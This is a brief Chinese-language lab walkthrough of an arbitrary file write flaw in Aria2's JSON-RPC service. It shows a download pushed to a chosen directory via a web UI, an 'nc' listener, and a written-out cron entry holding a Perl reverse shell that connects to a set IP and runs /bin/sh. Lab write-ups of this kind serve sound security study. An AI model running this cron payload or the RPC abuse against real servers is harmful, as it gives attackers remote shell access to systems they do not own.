eAria2

任意文件写入漏洞

Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。

6800是aria2的rpc服务的默认端口,环境启动后,访问`http://your-ip:6800/\`,发现服务已启动并且返回404页面。

因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/

打开yaaw,点击配置按钮,填入运行aria2的目标域名:`http://your-ip:6800/jsonrpc\`:

我在我的某台主机写了shell文件,并且用py -m http.server开放了端口,用内网穿透工具映射到公网,这里用第三方UI远程下载这个shell

1

提前开始监听nc -lvp 33

2

上传成功

3

* * * * * root /usr/bin/perl -e ‘use Socket;$i=”192.168.3.75”;$p=33;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

等待几秒钟反弹成功

4